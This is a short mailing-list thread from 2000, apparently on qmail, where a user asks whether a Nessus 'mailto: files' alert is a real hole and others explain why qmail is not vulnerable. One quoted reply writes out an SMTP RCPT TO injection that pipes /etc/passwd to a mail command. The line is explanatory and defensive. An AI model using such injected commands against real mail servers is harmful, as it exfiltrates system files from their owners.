Re: security hole?

2000-06-02 Thread Bob Waskosky

I think the example line in your reply triggered a virus alert.
I received an email stating the reply I sent possibly contained a password stealing 
virus. I hope that was just triggered by your example. I don't believe I have any 
viruses on this machine.

-- 
I fish therefore I lie.
Bob Waskosky <[EMAIL PROTECTED]>
The Perl Zone - http://www.nobhead.com/perl/
- 
   



Re: security hole?

2000-06-02 Thread Russell Nelson

Bob Waskosky writes:
 > > rcpt to: | programname
 > Is this a hole and how would I plug it?

It's not a hole.  It's someone trying to send mail to the email
address "| programname".  The vertical bar is odd, yes.  The space is
even more unusual, yes.  But a security hole?  No.  It would be if
qmail were to interpret the | specially, as certain versions of other
MTA's have in the past.  But qmail is neither that naive nor trusting.

-- 
-russ nelson <[EMAIL PROTECTED]>  http://russnelson.com
Crynwr sells support for free software  | PGPok | "Ask not what your country
521 Pleasant Valley Rd. | +1 315 268 1925 voice | can force other people to
Potsdam, NY 13676-3213  | +1 315 268 9201 FAX   | do for you..."  -Perry M.



Re: security hole?

2000-06-02 Thread Bob Waskosky

On Sat, Jun 03, 2000 at 04:29:07AM +, Jim Breton wrote:
> On Fri, Jun 02, 2000 at 11:17:30PM -0500, Bob Waskosky wrote:
> > Is this a hole and how would I plug it?
> 
> 
> No it's not a hole.  It would only be a security concern if your mailer
> were to allow the message to actually be piped directly to the program
> specified in the "rcpt to" command.
> 
> Say for example I were to send this command:
> 
> rcpt to: "|mail [EMAIL PROTECTED] < /etc/passwd"
> 
> or something similar.  And your MTA happily piped my message to that
> program, which also took /etc/passwd as input and mailed it to me at
> [EMAIL PROTECTED]  _That_ would be a problem.
> 
> With qmail however, pipe symbols are not treated specially and don't
> have the same meaning as they would in a shell.  They are handled as
> though they are part of a username, and since you don't have a local
> user "|mail" the message is treated as any normal message to an unknown
> user.
> 
> You don't need to change anything.  :)  Nessus assumes that because your
> mailer "accepted" the message, it will also deliver it in an "evil"
> way... which qmail won't do.
> 
kewl. Thanks for the info.

-- 
I fish therefore I lie.
Bob Waskosky <[EMAIL PROTECTED]>
The Perl Zone - http://www.nobhead.com/perl/
- 
   



Re: security hole?

2000-06-02 Thread Bob Waskosky

On Sat, Jun 03, 2000 at 04:09:21AM +, Jim Breton wrote:
> On Fri, Jun 02, 2000 at 10:58:51PM -0500, Bob Waskosky wrote:
> > Your MTA is vulnerable to the 'mailto: files' attack. Is this a hole or a false 
>positive because I,m scanning myself? Any ideas how to fix this?
> 
> 
> I believe Nessus (correct me if I'm wrong) is trying to send a mail
> message to a program like this:
> 
> rcpt to: | programname
> 
> in which case qmail doesn't handle it specially, it is probably getting
> picked up by your .qmail-default in ~alias (or getting bounced, if you
> don't have one).
> 
Is this a hole and how would I plug it?
Thanks

-- 
I fish therefore I lie.
Bob Waskosky <[EMAIL PROTECTED]>
The Perl Zone - http://www.nobhead.com/perl/
- 
   



security hole?

2000-06-02 Thread Bob Waskosky

Hi
I scanned myself online using nessus/nmap (scanning my dynamic IP) and received an 
email from nessus stating:

Your MTA is vulnerable to the 'mailto: files' attack. Is this a hole or a false 
positive because I,m scanning myself? Any ideas how to fix this?
Thanks in advance
Bob

-- 
I fish therefore I lie.
Bob Waskosky <[EMAIL PROTECTED]>
The Perl Zone - http://www.nobhead.com/perl/
-